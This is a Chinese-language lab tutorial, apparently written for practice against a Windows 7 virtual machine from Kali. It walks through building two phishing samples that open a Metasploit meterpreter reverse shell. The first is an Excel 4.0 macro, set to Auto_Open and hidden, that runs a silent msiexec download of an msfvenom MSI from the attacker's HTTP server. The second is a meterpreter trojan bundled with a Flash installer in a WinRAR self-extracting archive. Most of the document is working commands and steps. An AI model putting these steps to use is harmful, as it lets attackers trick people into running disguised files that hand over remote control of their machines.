靶机:32位windows7
攻击机:kali
一、制作恶意的excel钓鱼样本
1、在kali下,生成恶意 msi 文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f msi -o ok.msi
2、输入命令msfconsole,启动Metasploit 框架,建立监听,run后开始等待payload的连接
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.18.133
set lport 10000
run
3、python在具有恶意的msi的文件夹下开启http服务
python3 -m http.server 80
4、到windows7虚拟机下,新建一个.excel文件,在新建的excel文件的左下角Sheet1处右键,点击插入后,然后点击选择MS Excel 4.0 宏表,点击确定后成功加入宏表
5、在第一格处,输入=EXEC("msiexec /q /ihttp://192.168.18.133/ok.msi"),调用执行服务器上的msi文件
在第二格处,输入=HALT(),标识Excel 4.0宏结束
最后再重新点击第一格,然后在左上角A1模式处输入Auto_Open使excel打开时自动运行宏,再回车
在左下角宏1处点击右键,选择隐藏
按ctrl+s保存,在弹出的页面处点击选否,然后在弹出的另存为界面,点击选择保存类型为Excel启用宏的工作簿(*.xlsm),后点击保存
6、成功另存为一个.xlsm文件之后,点击打开,最后在提示界面宏已被禁用处,点击启用内容
7、最后回到kali,发现windows7已经可以成功连接上了
二、制作正常软件和恶意木马进行捆绑打包钓鱼样本
1、在kali里,生成恶意木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP地址 lport=监听的端口 -f exe -o okk.exe
2、在物理机里,复制生成的okk.exe恶意木马到和正常软件flash一起的目录下,然后ctrl点击连选这两个文件后进行捆绑压缩,右键在WinRAR下点击选择添加到压缩文件,然后在弹出的页面点击选择创建自解压格式压缩文件(X)
点击高级选项后,再点击自解压选项(X),然后在弹出来的页面常规框下的解压路径处,输入C:\windows\temp
点击设置,进入设置页面后,在解压后运行框下,输入解压后运行的恶意木马文件的文件名okk.exe和正常软件的文件名flashcenter_pp_ax_install_cn.exe
点击模块,在模块页面处,选择32位的Default32.SFX的自解压模块
最后一直点击确定,生成压缩好的带木马flash.exe文件
3、回到kali虚拟机下,输入命令msfconsole,启动Metasploit 框架,建立监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.18.133
set lport 10101
run
4、将压缩好的flash.exe恶意木马文件复制到windows7虚拟机下,后点击此文件,在弹出的页面处点击安装
5、最后回到kali虚拟机下,可以看到windows7已经成功连接上了